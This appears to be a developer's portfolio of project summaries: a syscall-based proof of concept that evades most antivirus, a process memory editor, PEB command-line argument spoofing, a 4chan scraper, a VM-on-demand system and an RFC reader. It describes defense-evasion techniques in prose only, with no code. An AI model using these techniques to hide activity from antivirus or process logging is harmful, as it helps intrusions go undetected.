This is a proof of concept project that aims at utilizing syscalls as opposed to ntdll / kernel32 functions.
While this POC is able to skirt around the majority of antivirus software, it still falls flat at manual analysis. The next and inevitable step is to look at obfuscating the code, either through dynamic library loading or other means.
I have really enjoyed working on this, and feel like yet again, it's my most technical project so far. While this specific repo might die, I'll continue the general project, maybe under a different name.
After getting more involved with reversing, I got the idea to start work on this project. The goal of this software is to enable text editor like editing of the assembly of running processes. There are better tools for memory manipulation, but I didn't find any that fit this specific niece. As a big plus, this is a great opportunity to learn more about processes on Windows.
As I begun work on this, I also realized that I need to write better rust-like, safe abstractions for the Windows API, which has been a side bonus on this side. Once I'm happy with the state of the code, I'll likely rip out the Windows API abstractions, and make another repo for just them. I have definitely been enjoying these more technical projects.
Reading up more on how processes work and seeing how Windows logs process events, I was curious about seeing if I could possibly spoof command line arguments on Windows.
My initial idea was choosing one program, like powershell and attempting to overwrite the command line arguments in the process' memory. Reading a bit more on the PEB structure, I realized that I could make the spoofing work for any software, regardless of how they store command line arguments in memory. Now, I've written the first version of it (with terrible formatting, of course). The software starts a suspended process with bogus arguments, overwrites the PEB structure's arguments and then resumes execution.
The outcome works. I'm happy enough with it, although I will rewrite the entire program once my abstractions of the Windows API are in better shape. This project helped me better my understanding of how Windows and the API for it work.
I was looking for a way to download and archive huge sets of data from 4chan, for a now scrapped OSINT software. Originally, this repository contains two different scrapers, one for desuarchive using beautifulsoup, and one for 4chan using the 4chan API. The repository also containers an offline 'reader' for the output that the desuarchive scraper produces. Thanks !irneh
I've been very interested in VMs in the past, not only from a theoretical side but also practically speaking, how could I create a VM, what would be the real world purposes and whatnot.
My first serious introduction to VMs (aside from reading up on them) was building a single GPU passthrough virtual machine. The end goal of this would be to play VR games without installing Windows on bare metal. I succeeded in this and was able to play VR games with Windows running as a virtual machine. This gave me a good taste of virtualization, and definitely heightened my interest in them.
Now, exactly a year later, having seen how VDI and EsXi work at the University of Helsinki, naturally instead of using vagrant or another virtualization solution designed for this, I wanted to build my own 'Vm-On-Demand' system. My outline on the project was very simple. I log in to a port in a specified port-range using SSH. After this, a VM would be created that would exist for me to mess around in until I decide to log off, after which the VM is destroyed.
Originally I thought about writing a listener that would listen on the port and just spin up the VM and clone traffic from the port to the VM. After thinking about this more, a few technical difficulties came to mind and I moved on to another, the current idea.
At the moment, the VM system works by having a 'gateway' vm node. A machine that purely handles the initial connection and commands the creation/destruction of vms. The project is still very much in its infancy, I've written the current set up with bash and it works, but it's mostly a proof of concept. For now, it's useful to me and helped me learn qemu/virsh better.
As I've been reading up on the history of the internet and learning about different protocols with rfc pages, I got annoyed at having to open up a browser, search for an RFC reference number, open up a page and then read the rfc from there.
My solution to this was very simple, I wrote a very simple and short python script that I can use to download and read any RFC page on the command line.